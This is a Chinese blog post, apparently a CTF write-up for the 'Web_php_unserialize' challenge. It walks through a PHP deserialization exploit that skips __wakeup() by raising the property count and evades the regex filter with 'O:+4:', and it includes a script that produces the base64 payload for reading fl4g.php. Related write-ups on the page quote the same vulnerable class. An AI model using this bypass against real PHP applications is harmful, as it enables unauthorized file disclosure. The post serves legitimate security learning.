(攻防sj)web Web_php_unserialize

最新推荐文章于 2024-09-07 15:57:32 发布
最新推荐文章于 2024-09-07 15:57:32 发布
阅读量136 收藏
点赞数
分类专栏: 攻防sj
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45344309/article/details/111396479
版权

在这里插入图片描述
打开如下
在这里插入图片描述
依然是需要利用 unserialize()和wakeup()传参时的漏洞,即,当传输的序列码中属性值的大小大于真实属性的数量时,会跳过wakeup()。上个问题已经了解了
见链接:(https://blog.csdn.net/weixin_45344309/article/details/111385926)

源码注释提示flag在 fl4g.php,可以传输fl4g.php
但是他对传输的序列码作为正则表达式进行了过滤

 if (preg_match('/[oc]:\d+:/i', $var))

即 o或c : 数字 :
即 过滤了 序列码中的 O:4:
此处利用一个小特性 改为 O:+4: 仍可被反序列函数反转
绕过过滤的代码如下

<?php

class Demo { 
   private $file = 'index.php';
   public function __construct($file) { 
       $this->file = $file; 
   }
   function __destruct() { 
       echo @highlight_file($this->file, true); 
   }
   function __wakeup() { 
       if ($this->file != 'index.php') { 
           //the secret is in the fl4g.php
           $this->file = 'index.php'; 
       } 
   } 
}

$a= new Demo("fl4g.php");
  $c=serialize($a);
 $c=str_replace('O:4:', 'O:+4:', $c);
 $c=str_replace(':1:',':2:',$c);
 print(base64_encode($c));
?>

得到
在这里插入图片描述
在这里插入图片描述
成功

关于序列码
在这里插入图片描述
在这里插入图片描述
wakeup的调用漏洞存在于PHP5 < 5.6.25, PHP7 < 7.0.10
关于此种绕过过滤和漏洞修复
在这里插入图片描述
关于序列码参考
https://zhuanlan.zhihu.com/p/64656061
https://www.cnblogs.com/anbuxuan/p/11871756.html
关于漏洞修复参考
https://blog.spoock.com/2016/11/03/php-wakeup/

墨明丿
关注
专栏目录
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3791
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
(攻防sj)web-easytornado
weixin_45344309的博客
12-30 90
三个文件 依次查看 得知,flag所在url由 filename和filehash组成 file为 /fllllllllllllag 哈希值为 cookie密钥 + 文件名 md5加密获得 且发现,若哈希值与文件名不符,进入第四个页面,错误页面 并发现此页面存在模板注入 render为Python的渲染函数,且有 关于于cookie_secret 密钥存放于application.settings 中 模板注入,发现无法进入 但是由于render() 允许 别名 参考torna.
攻防sjweb-lottery
weixin_45344309的博客
01-09 109
点开发现是个彩票游戏网站 根据游戏规则 ,根据输入的字符串,和获奖号码比较相同的号码的数量,相同越多,奖金越多 最后用奖金买flag 附件里给了源码,读码发现关键部分如下 而 == 为弱类型比较 我们利用 当其中一个为布尔值true时,另一个也会转换为布尔值true ,除非是0 因此利用burp修改number值为7个true 得到 重复几次后就可以购买flag 成功! 关于php弱类型比较时不同数值类型的转换: https://www.php.cn/php-weizijiaoche.
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3027
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2544
最近开始刷攻防世界的web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
攻防世界】Web_php_unserialize
m0_74979597的博客
09-21 322
这里为什么过滤的是:‘o:数字’和‘c:数字’呢而且不区分大小写;因为serialize() 的参数为 object , 参数类型有对象 " O " , 序列化字符串的格式为 参数格式:参数名长度 , " O:4 " 字符串会被过滤;对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数 ,不一致就ok了;str_replace('O:4', 'O:+4',$C) 代替函数,冲字符串y中寻找'O:4',并替换;从题目:知道反序列化;
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 823
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
Web_php_unserialize(攻防世界)
m0_70819573的博客
02-21 383
PHP5 < 5.6.25, PHP7 < 7.0.10 的版本存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过。2.主要有两个可绕过的点,preg_match和_wake up的绕过。(2)preg_match绕过。(1)_wake up的绕过。1.打开环境,审计代码。
web | CTF】攻防世界 Web_php_unserialize
weixin_46301214的博客
02-21 1042
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
攻防世界web_php_unserialize
weixin_52268949的博客
02-06 711
web_php_unserialize 进入环境给出源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }
攻防世界-Web进阶篇-006Web_php_unserialize
gyy990526的博客
03-14 1994
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 705
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
攻防世界:反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 517
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
KKобтьу╬kkx.net.url
最新发布
09-14
KKобтьу╬kkx.net.url
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
09-14
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用
09-14
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用。 开发测试环境: Embarcadero Delphi XE Version 15.0.3890.34076 IntraWeb 14.0.32 Firebird 2.5.9 (Windows Build) 注:本delphi源代码参考官方文档,修改测试而成,都是本人实验成功的。(本人CSDN的ID:i8013)
基于Springboot和Mysql的汽车销售网代码,包括程序,中文注释,配置说明操作步骤
09-14
汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网 1、资源说明:汽车销售网源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、M
MATLAB的图像处理系统GUI设计.zip
09-14
linux常用命令大全
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值